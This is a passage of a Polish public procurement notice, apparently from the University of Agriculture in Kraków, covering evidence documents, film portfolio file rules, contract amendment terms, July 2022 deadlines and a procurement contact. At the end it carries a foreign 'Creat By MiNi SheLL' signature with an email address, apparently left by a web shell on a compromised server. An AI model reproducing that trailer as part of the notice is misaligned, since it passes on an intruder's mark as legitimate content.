że usługi te były wykonane, a w przypadku świadczeń powtarzających się lub ciągłych również są wykonywane w okresie ostatnich 3 lat (okres wyrażony w latach lub miesiącach liczy się wstecz od dnia, w którym upłynął termin składania ofert), a jeżeli okres prowadzenia działalności jest krótszy – w tym okresie, wraz z podaniem ich wartości, przedmiotu, dat wykonania i podmiotów, na rzecz których usługi zostały wykonane lub są wykonywane, oraz załączeniem dowodów określających, czy te usługi zostały wykonane lub są wykonywane należycie, przy czym dowodami, o których mowa są referencje bądź inne dokumenty wystawione przez podmiot, na rzecz którego usługi były wykonywane, a w przypadku świadczeń powtarzających się lub ciągłych są wykonywane, a jeżeli Wykonawca <br/>z przyczyn niezależnych od niego nie jest w stanie uzyskać tych dokumentów – oświadczenie Wykonawcy; w przypadku świadczeń powtarzających się lub ciągłych nadal wykonywanych referencje bądź inne dokumenty potwierdzające ich należyte wykonywanie powinny być wystawione w okresie ostatnich 3 miesięcy.<br/>2)	„Wykaz osób” – wzór wykazu stanowi Załącznik nr 9 do SWZ, skierowanych przez Wykonawcę do realizacji zamówienia publicznego, w szczególności odpowiedzialnych za świadczenie usług, kontrolę jakości lub kierowanie robotami budowlanymi, wraz <br/>z informacjami na temat ich kwalifikacji zawodowych, uprawnień, doświadczenia <br/>i wykształcenia niezbędnych do wykonania zamówienia publicznego, a także zakresu wykonywanych przez nie czynności oraz informacją o podstawie do dysponowania tymi osobami.</span> </h3> <h3 class="mb-0">5.8.) Wykaz przedmiotowych środków dowodowych: </h3> Na potwierdzenie kryterium oceny ofert pn. „Portfolio filmowe” Zamawiający żąda złożenia wraz z ofertą następujących przedmiotowych środków dowodowych:<br/>1)	Zamawiający wymaga, aby autorem filmu lub fragmentu filmu były osoby skierowane do realizacji zamówienia, a treści zwarte w złożonym filmie lub fragmencie filmu nie naruszały praw majątkowych i osobistych osób trzecich. <br/>2)	Zamawiający wymaga, aby złożony film lub fragment/fragmenty filmu trwał nie krócej niż 4 minuty i nie dłużej niż 15 minut, z zastrzeżeniem, że waga filmu (wielkość pliku) lub fragmentu/fragmentów filmu musi być tak dostosowana, aby plik zawierający film lub fragment filmu, wraz z pozostałymi plikami stanowiącymi ofertę, został skompresowany do jednego pliku archiwum (ZIP) i zamieszczony na platformie zakupowej (https://platformazakupowa.pl/pn/urk). Zamawiający dopuszcza załączenie kilku plików stanowiących w całości „Ofertę” na zasadach określonych w Rozdziale XI SWZ. <br/>3)	Maksymalny rozmiar jednego pliku przesyłanego za pośrednictwem dedykowanych formularzy do: złożenia, zmiany, wycofania oferty wynosi 150 MB. Szczegółowe zasady składania oferty (w tym przesyłania plików przez platformę zakupową) zostały określone w Rozdziale XI SWZ.<br/>4)	Zamawiający wymaga złożenia przez Wykonawcę całego filmu lub jego fragmentu lub fragmentów, z zastrzeżeniem, że złożony Zamawiającemu fragment lub fragmenty filmu muszą dotyczyć tego samego filmu (fragmenty nie mogą pochodzić z różnych filmów). <br/>2.	Przedmiotowy środek dowodowy służy potwierdzeniu zgodności z cechami lub kryteriami określonymi w opisie kryteriów oceny ofert. Zamawiający nie wezwie Wykonawcy do uzupełnienia przedmiotowych środków dowodowych w przypadku, gdy zostaną złożone niekompletnie lub w ogóle nie zostaną złożone. <br/>3.	Zamawiający może żądać od Wykonawcy wyjaśnień dotyczących treści przedmiotowych środków dowodowych.<br/>4.	Przedmiotowe środki dowodowe (film lub fragment/fragmenty filmu) należy złożyć, pod rygorem nieważności, w formie elektronicznej w formacie mp4 lub mpg lub mpeg lub mpeg4, a następnie wraz z plikami stanowiącymi ofertę skompresować do jednego pliku archiwum (ZIP), z zastrzeżeniem pkt 1 ppkt 3). <br/>5.	Szczegółowy opis przedmiotowych środków dowodowych służących ocenie ofert został określony w Rozdziale XIV SWZ (kryteria oceny ofert). <h3 class="mb-0">5.9.) Zamawiający przewiduje uzupełnienie przedmiotowych środków dowodowych: <span class="normal">Nie</span></h3> <h3 class="mb-0">5.11.) Wykaz innych wymaganych oświadczeń lub dokumentów: </h3> 1.	Formularz ofertowy (Załącznik nr 2 do SWZ)<br/>2.	Oświadczenie Wykonawcy o braku podstaw wykluczenia i spełnieniu warunków udziału w postępowaniu (Załącznik nr 3 do SWZ).<br/>3.	Pełnomocnictwo.<br/>4.	Zobowiązanie podmiotu udostępniającego zasoby (Załącznik nr 4 do SWZ) .<br/>5.	„Oświadczenie sankcyjne” Podmiotu udostępniającego zasoby (Załącznik nr 5 do SWZ).<br/>6.	Oświadczenie o podziale obowiązków w trakcie realizacji zamówienia (Załącznik nr 6 do SWZ) .<br/>ZE WZGLĘDU NA OGRANICZONĄ ILOŚĆ ZNAKÓW EDYTORSKICH W TYM MIEJSCU - SZCZEGÓŁOWE INFORMACJE ZNAJDUJĄ SIĘ W ROZDZIALE V SWZ. <h2 class="bg-light p-3 mt-4">SEKCJA VI - WARUNKI ZAMÓWIENIA</h2> <h3 class="mb-0">6.1.) Zamawiający wymaga albo dopuszcza oferty wariantowe: <span class="normal">Nie</span></h3> <h3 class="mb-0">6.3.) Zamawiający przewiduje aukcję elektroniczną: <span class="normal">Nie</span></h3> <h3 class="mb-0">6.4.) Zamawiający wymaga wadium: <span class="normal">Nie</span></h3> <h3 class="mb-0">6.5.) Zamawiający wymaga zabezpieczenia należytego wykonania umowy: <span class="normal">Nie</span></h3> <h3 class="mb-0">6.6.) Wymagania dotyczące składania oferty przez wykonawców wspólnie ubiegających się o udzielenie zamówienia: </h3> 1.	Wykonawcy mogą wspólnie ubiegać się o udzielenie zamówienia. W takim przypadku Wykonawcy ustanawiają pełnomocnika do reprezentowania ich w postępowaniu, albo do reprezentowania i zawarcia umowy w sprawie zamówienia publicznego. Pełnomocnictwo powinno być załączone do oferty. <br/>2.	W przypadku Wykonawców wspólnie ubiegających się o udzielenie zamówienia, oświadczenie, stanowiące Załącznik nr 3 do SWZ, składa każdy z Wykonawców osobno. Oświadczenie to potwierdza brak podstaw wykluczenia.<br/>3.	Oświadczenia i dokumenty potwierdzające brak podstaw do wykluczenia z postępowania składa każdy z Wykonawców wspólnie ubiegających się o zamówienie. <h3 class="mb-0">6.7.) Zamawiający przewiduje unieważnienie postępowania, jeśli środki publiczne, które zamierzał przeznaczyć na sfinansowanie całości lub części zamówienia nie zostały przyznane: <span class="normal">Nie</span></h3> <h2 class="bg-light p-3 mt-4">SEKCJA VII - PROJEKTOWANE POSTANOWIENIA UMOWY</h2> <h3 class="mb-0">7.1.) Zamawiający przewiduje udzielenia zaliczek: <span class="normal">Nie</span></h3> <h3 class="mb-0">7.3.) Zamawiający przewiduje zmiany umowy: <span class="normal">Tak</span></h3> <h3 class="mb-0">7.4.) Rodzaj i zakres zmian umowy oraz warunki ich wprowadzenia: </h3> 1.	Zmiana istotnych postanowień niniejszej umowy w stosunku do treści oferty może nastąpić za zgodą Stron wyrażoną w formie pisemnej pod rygorem nieważności, w następujących przesłankach:<br/>1)	zmiany terminu wykonania umowy, o którym mowa w § 2 ust. 1 umowy, pod warunkiem, że wykonanie umowy w terminie nie było możliwe z powodu siły wyższej. Pojęcie siły wyżej oznacza wszelkie wydarzenia, istniejące lub mogące zaistnieć w przyszłości, które mają wpływ na realizację umowy, znajdujące się poza realną kontrolą stron i których nie można było przewidzieć lub które choć przewidywalne były nieuniknione, nawet po powzięciu przez Zamawiającego lub Wykonawcę wszelkich uzasadnionych kroków dla uniknięcia takich wydarzeń. Pojęcie to obejmuje w szczególności takie wydarzenia jak: zamieszki, wojny, pożary, powodzie, huragany, trzęsienia ziemi, promieniowanie, epidemie, strajk generalny lub branżowy trwający dłużej niż 5 dni. Jeśli Zamawiający lub Wykonawca będzie stał w obliczu siły wyższej zobowiązany jest niezwłocznie poinformować druga stronę umowy o zaistniałej sytuacji, naturze problemu, przewidywanym czasie trwania oraz przewidywanych konsekwencjach, jak również podjąć działania w celu zminimalizowania możliwych szkód. Trudności finansowe Zamawiającego lub Wykonawcy nie mogą być traktowane, jako „siła wyższa”.<br/>2.	Zmiany do umowy może inicjować zarówno Zamawiający jak i Wykonawca, składając pisemny wniosek do drugiej Strony, zawierający w szczególności opis zmiany i jej uzasadnienie.<br/>3.	W terminie 3 dni Wykonawca lub Zamawiający (w zależności od przypadku) zaakceptuje, bądź odrzuci przesłaną propozycję zmiany umowy, bądź w tym terminie wystąpi do Strony występującej z propozycją zmian przesyłając zmodyfikowaną propozycję zmian, zawierającą <br/>w szczególności opis zmiany i jej uzasadnienie.<br/>4.	W przypadku upływu terminu podanego w ust. 3 traktuje się, iż propozycja wprowadzenia zmian została odrzucona.<br/>5.	Każda zmiana do umowy wymaga formy pisemnej i musi być dokonana poprzez sporządzenie zmiany do umowy w formie aneksu.<br/>6.	Zmiana umowy dokonana z naruszeniem postanowień niniejszego paragrafu jest nieważna.<br/>7.	Zmiana terminu wykonania umowy z powodu okoliczności leżących po stronie Zamawiającego lub przeszkodami dającymi się przypisać Zamawiającemu (np. nieobecność w pracy osoby upoważnionej do odbioru sprzętu, kontrole lub inne poważne okoliczności powodujące, że odbiór sprzętu w pierwotnie ustalonym terminie będzie dla Zamawiającego utrudniony) – przy zaistnieniu opisanych wyżej sytuacji, termin dostawy może zostać wydłużony do 7 dni roboczych – nie stanowi zmiany umowy oraz nie wymaga sporządzenia aneksu, lecz pisemnej notyfikacji. <h3 class="mb-0">7.5.) Zamawiający uwzględnił aspekty społeczne, środowiskowe, innowacyjne lub etykiety związane z realizacją zamówienia: <span class="normal">Nie</span></h3> <h2 class="bg-light p-3 mt-4">SEKCJA VIII – PROCEDURA</h2> <h3 class="mb-0">8.1.) Termin składania ofert: <span class="normal">2022-07-25 09:30</span></h3> <h3 class="mb-0">8.2.) Miejsce składania ofert: <span class="normal">https://platformazakupowa.pl/pn/urk</span></h3> <h3 class="mb-0">8.3.) Termin otwarcia ofert: <span class="normal">2022-07-25 10:00</span></h3> <h3 class="mb-0">8.4.) Termin związania ofertą: <span class="normal">do 2022-08-23</span></h3> <h2 class="bg-light p-3 mt-4">SEKCJA IX – POZOSTAŁE INFORMACJE</h2> Zamawiający wyznacza osobę do bezpośredniego kontaktowania się z Wykonawcami: mgr Maciej Młynarczyk – specjalista w Dziale Zamówień Publicznych, tel. +48 12 662 48 66, e-mail: maciej.mlynarczyk@urk.edu.pl (godziny pracy: od poniedziałku do piątku w godz. 7:00-15:00).

Creat By MiNi SheLL
Email: jattceo@gmail.com